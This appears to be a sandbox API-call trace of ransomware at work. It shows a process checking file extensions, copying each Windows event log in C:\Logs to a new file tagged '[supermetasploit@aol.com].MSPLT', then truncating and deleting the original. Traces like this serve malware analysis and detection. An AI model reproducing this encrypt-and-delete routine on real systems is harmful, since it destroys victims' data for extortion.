[0287.716] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0287.716] lstrlenW (lpString=".xlsx") returned 5 [0287.717] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0287.717] lstrlenW (lpString=".ppt") returned 4 [0287.717] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0287.717] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0287.717] lstrlenW (lpString=".zip") returned 4 [0287.717] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0287.717] lstrlenW (lpString=".rar") returned 4 [0287.717] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0287.717] lstrlenW (lpString=".bz2") returned 4 [0287.717] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0287.717] lstrlenW (lpString=".7z") returned 3 [0287.717] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0287.717] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0287.717] lstrlenW (lpString=".dbf") returned 4 [0287.717] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0287.717] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0287.717] lstrlenW (lpString=".1cd") returned 4 [0287.717] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0287.717] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0287.717] lstrlenW (lpString=".jpg") returned 4 [0287.717] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0287.717] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0287.717] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0287.717] lstrlenW (lpString=".doc") returned 4 [0287.718] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0287.718] lstrlenW (lpString=".docx") returned 5 [0287.718] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0287.718] lstrlenW (lpString=".pdf") returned 4 [0287.718] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0287.718] lstrlenW (lpString=".xls") returned 4 [0287.718] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0287.718] lstrlenW (lpString=".xlsx") returned 5 [0287.718] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0287.718] lstrlenW (lpString=".ppt") returned 4 [0287.718] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0287.718] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0287.718] lstrlenW (lpString=".zip") returned 4 [0287.718] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0287.718] lstrlenW (lpString=".rar") returned 4 [0287.718] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0287.718] lstrlenW (lpString=".bz2") returned 4 [0287.718] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0287.718] lstrlenW (lpString=".7z") returned 3 [0287.718] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0287.718] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0287.719] lstrlenW (lpString=".dbf") returned 4 [0287.719] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0287.719] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0287.719] lstrlenW (lpString=".1cd") returned 4 [0287.719] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0287.719] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0287.719] lstrlenW (lpString=".jpg") returned 4 [0287.719] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0287.719] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0287.719] lstrlenW (lpString="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 56 [0287.719] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0287.719] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=69632) returned 1 [0287.720] CloseHandle (hObject=0x440) returned 1 [0287.720] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx")) returned 0x20 [0287.720] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.720] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0287.720] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0287.720] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0287.720] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0287.721] GetLastError () returned 0x0 [0287.721] ReadFile (in: hFile=0x440, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x11000, lpOverlapped=0x0) returned 1 [0287.752] WriteFile (in: hFile=0x3f4, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x11010, lpOverlapped=0x0) returned 1 [0287.754] ReadFile (in: hFile=0x440, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0287.754] WriteFile (in: hFile=0x3f4, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x144, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x144, lpOverlapped=0x0) returned 1 [0287.754] SetEndOfFile (hFile=0x3f4) returned 1 [0288.107] CloseHandle (hObject=0x3f4) returned 1 [0288.340] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.340] SetEndOfFile (hFile=0x440) returned 1 [0288.359] CloseHandle (hObject=0x440) returned 1 [0288.359] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0288.360] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx")) returned 1 [0288.360] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0288.360] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0288.360] lstrlenW (lpString=".doc") returned 4 [0288.360] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.360] lstrlenW (lpString=".docx") returned 5 [0288.360] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.360] lstrlenW (lpString=".pdf") returned 4 [0288.360] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.360] lstrlenW (lpString=".xls") returned 4 [0288.360] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.360] lstrlenW (lpString=".xlsx") returned 5 [0288.361] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.361] lstrlenW (lpString=".ppt") returned 4 [0288.361] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.361] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0288.361] lstrlenW (lpString=".zip") returned 4 [0288.361] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.361] lstrlenW (lpString=".rar") returned 4 [0288.361] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.361] lstrlenW (lpString=".bz2") returned 4 [0288.361] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.361] lstrlenW (lpString=".7z") returned 3 [0288.361] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.361] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0288.361] lstrlenW (lpString=".dbf") returned 4 [0288.361] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.361] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0288.361] lstrlenW (lpString=".1cd") returned 4 [0288.361] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.361] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0288.361] lstrlenW (lpString=".jpg") returned 4 [0288.361] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.361] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0288.361] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0288.361] lstrlenW (lpString=".doc") returned 4 [0288.361] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.361] lstrlenW (lpString=".docx") returned 5 [0288.362] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.362] lstrlenW (lpString=".pdf") returned 4 [0288.362] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.362] lstrlenW (lpString=".xls") returned 4 [0288.362] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.362] lstrlenW (lpString=".xlsx") returned 5 [0288.362] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.362] lstrlenW (lpString=".ppt") returned 4 [0288.362] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.362] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0288.362] lstrlenW (lpString=".zip") returned 4 [0288.362] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.362] lstrlenW (lpString=".rar") returned 4 [0288.362] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.362] lstrlenW (lpString=".bz2") returned 4 [0288.362] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.362] lstrlenW (lpString=".7z") returned 3 [0288.362] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.362] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0288.362] lstrlenW (lpString=".dbf") returned 4 [0288.362] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.362] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0288.362] lstrlenW (lpString=".1cd") returned 4 [0288.362] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.362] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0288.362] lstrlenW (lpString=".jpg") returned 4 [0288.363] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.363] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0288.363] lstrlenW (lpString="Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 49 [0288.363] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0288.363] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=69632) returned 1 [0288.363] CloseHandle (hObject=0x440) returned 1 [0288.363] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx")) returned 0x20 [0288.364] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0288.364] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0288.364] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.364] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.364] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0288.365] GetLastError () returned 0x0 [0288.365] ReadFile (in: hFile=0x440, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x11000, lpOverlapped=0x0) returned 1 [0288.378] WriteFile (in: hFile=0x3d0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x11010, lpOverlapped=0x0) returned 1 [0288.382] ReadFile (in: hFile=0x440, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0288.382] WriteFile (in: hFile=0x3d0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x136, lpOverlapped=0x0) returned 1 [0288.382] SetEndOfFile (hFile=0x3d0) returned 1 [0288.382] CloseHandle (hObject=0x3d0) returned 1 [0288.389] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.389] SetEndOfFile (hFile=0x440) returned 1 [0288.391] CloseHandle (hObject=0x440) returned 1 [0288.391] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0288.391] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx")) returned 1 [0288.391] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0288.392] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0288.392] lstrlenW (lpString=".doc") returned 4 [0288.392] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.392] lstrlenW (lpString=".docx") returned 5 [0288.392] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.392] lstrlenW (lpString=".pdf") returned 4 [0288.392] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.392] lstrlenW (lpString=".xls") returned 4 [0288.392] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.392] lstrlenW (lpString=".xlsx") returned 5 [0288.392] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.392] lstrlenW (lpString=".ppt") returned 4 [0288.392] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.392] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0288.392] lstrlenW (lpString=".zip") returned 4 [0288.392] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.392] lstrlenW (lpString=".rar") returned 4 [0288.392] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.392] lstrlenW (lpString=".bz2") returned 4 [0288.392] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.392] lstrlenW (lpString=".7z") returned 3 [0288.392] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.392] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0288.392] lstrlenW (lpString=".dbf") returned 4 [0288.392] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.392] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0288.392] lstrlenW (lpString=".1cd") returned 4 [0288.392] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.393] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0288.393] lstrlenW (lpString=".jpg") returned 4 [0288.393] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.393] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0288.393] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0288.393] lstrlenW (lpString=".doc") returned 4 [0288.393] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.393] lstrlenW (lpString=".docx") returned 5 [0288.393] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.393] lstrlenW (lpString=".pdf") returned 4 [0288.393] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.393] lstrlenW (lpString=".xls") returned 4 [0288.393] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.393] lstrlenW (lpString=".xlsx") returned 5 [0288.393] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.393] lstrlenW (lpString=".ppt") returned 4 [0288.393] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.393] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0288.393] lstrlenW (lpString=".zip") returned 4 [0288.393] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.393] lstrlenW (lpString=".rar") returned 4 [0288.393] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.393] lstrlenW (lpString=".bz2") returned 4 [0288.393] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.393] lstrlenW (lpString=".7z") returned 3 [0288.393] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.393] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0288.394] lstrlenW (lpString=".dbf") returned 4 [0288.394] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.394] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0288.394] lstrlenW (lpString=".1cd") returned 4 [0288.394] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.394] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0288.394] lstrlenW (lpString=".jpg") returned 4 [0288.394] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.394] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0288.394] lstrlenW (lpString="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 64 [0288.394] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0288.397] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=69632) returned 1 [0288.397] CloseHandle (hObject=0x440) returned 1 [0288.397] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx")) returned 0x20 [0288.397] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0288.397] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0288.398] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.398] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.398] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0288.398] GetLastError () returned 0x0 [0288.398] ReadFile (in: hFile=0x440, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x11000, lpOverlapped=0x0) returned 1 [0288.581] WriteFile (in: hFile=0x3d0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x11010, lpOverlapped=0x0) returned 1 [0288.585] ReadFile (in: hFile=0x440, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0288.585] WriteFile (in: hFile=0x3d0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x154, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x154, lpOverlapped=0x0) returned 1 [0288.585] SetEndOfFile (hFile=0x3d0) returned 1 [0288.585] CloseHandle (hObject=0x3d0) returned 1 [0288.596] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0288.596] SetEndOfFile (hFile=0x440) returned 1 [0288.598] CloseHandle (hObject=0x440) returned 1 [0288.599] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0288.599] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx")) returned 1 [0288.600] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0288.600] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0288.600] lstrlenW (lpString=".doc") returned 4 [0288.600] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.600] lstrlenW (lpString=".docx") returned 5 [0288.600] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.600] lstrlenW (lpString=".pdf") returned 4 [0288.600] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.600] lstrlenW (lpString=".xls") returned 4 [0288.600] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.600] lstrlenW (lpString=".xlsx") returned 5 [0288.600] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.600] lstrlenW (lpString=".ppt") returned 4 [0288.600] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.600] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0288.600] lstrlenW (lpString=".zip") returned 4 [0288.601] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.601] lstrlenW (lpString=".rar") returned 4 [0288.601] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.601] lstrlenW (lpString=".bz2") returned 4 [0288.601] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.601] lstrlenW (lpString=".7z") returned 3 [0288.601] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.601] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0288.601] lstrlenW (lpString=".dbf") returned 4 [0288.601] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.601] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0288.601] lstrlenW (lpString=".1cd") returned 4 [0288.601] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 